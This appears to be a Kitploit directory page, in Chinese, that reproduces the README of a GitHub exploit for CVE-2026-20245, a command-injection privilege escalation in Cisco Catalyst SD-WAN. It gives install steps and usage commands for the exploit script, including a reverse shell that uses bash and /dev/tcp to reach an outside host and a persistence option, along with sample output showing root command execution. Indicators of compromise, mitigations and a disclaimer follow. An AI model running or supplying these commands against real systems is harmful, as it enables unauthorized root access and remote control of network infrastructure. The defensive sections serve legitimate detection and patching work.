Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit — **此代码仅用于教育目的和授权的安全测试。** | Kitploit
工具/GitHubGitHub/fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit
权限提升漏洞分析漏洞利用Web应用程序漏洞利用网络安全渗透测试命令与控制学习与教育

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
fevar54/cve-2026-20245---cisco-sd-wan-privilege-escalation-exploit

CVE-2026-20245---Cisco-SD-WAN-Privilege-Escalation-Exploit

**此代码仅用于教育目的和授权的安全测试。**

查看仓库
343个月前尚未审核

CVE-2026-20245 - Cisco SD-WAN 权限提升利用工具

Security Rating CVSS CISA KEV

⚠️ 警告

此代码仅用于教育目的和授权的安全测试。

📋 描述

CVE-2026-20245 是 Cisco Catalyst SD-WAN Controller (vSmart)、Cisco Catalyst SD-WAN Manager (vManage) 和 Cisco Catalyst SD-WAN Validator (vBond) CLI 中的一个权限提升漏洞。拥有 netadmin 权限的认证攻击者可以通过上传特制文件以 root 身份执行任意命令。

技术细节

字段值
CVECVE-2026-20245
CVSS7.8 (高)
向量AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
组件CLI / CSV 上传
类型命令注入 (CWE-116)

🎯 受影响版本

产品受影响版本
Cisco Catalyst SD-WAN Manager< 20.18.3.1
Cisco Catalyst SD-WAN Controller (vSmart)< 20.18.3.1
Cisco Catalyst SD-WAN Validator (vBond)< 20.18.3.1

具体受影响版本:

  • 20.9.x (全部)
  • 20.10.x - 20.12.5.3
  • 20.12.6 - 20.12.6.1
  • 20.12.7
  • 20.13.x - 20.15.4.3
  • 20.15.5 - 20.15.5.1
  • 20.16.x - 20.18.2.1

🔧 安装

root@kitploit:~
# 克隆仓库
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC

# 安装依赖
pip install -r requirements.txt

# 赋予权限
chmod +x exploit.py
📦 依赖
txt
requests>=2.31.0
🚀 使用
检查版本
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
执行命令
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
反弹 shell
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
安装持久化
bash
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
🔍 预期输出
text
╔═══════════════════════════════════════════════════════════════════╗
║  CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit     ║
║  Command Injection via Crafted File Upload                       ║
║  CVSS: 7.8 (High) | CISA KEV: 2026-06-09                        ║
╚═══════════════════════════════════════════════════════════════════╝

[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload

============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
🔍 入侵指标 (IOC)
检查日志 (/var/log/scripts.log)
bash
# 查找可疑活动
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log

# 特定命令查找
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
可疑文件
/home/admin/*.csv (未授权 CSV 文件)

/tmp/*.csv

/var/log/scripts.log 包含异常条目

进程
bash
# 查找异常 root 进程
ps aux | grep -E "bash|sh|nc|ncat|socat"
🛡️ 缓解措施
选项 1 - 更新到修复版本(推荐)
版本	修复版本
20.18.2.1 及更早	20.18.3.1
选项 2 - 限制访问
限制管理访问仅限于管理网络

使用多因素认证

监控 CSV 上传活动

选项 3 - 安全配置
text
# 如非必要,禁用序列号上传
no feature upload-serial-numbers

# 限制 netadmin 权限
admin privilege restrict
📚 参考
Cisco 安全公告

NVD - CVE-2026-20245

CISA KEV 目录

📊 时间线
日期	事件
2026-05-14	Cisco 发布初始公告
2026-06-04	CVE 正式发布
2026-06-09	CISA 添加至 KEV
2026-06-23	CISA 修补截止日期
⚖️ 免责声明
本软件按“原样”提供,不提供任何担保。作者不对滥用行为负责。请仅在授权系统上使用。
下载工具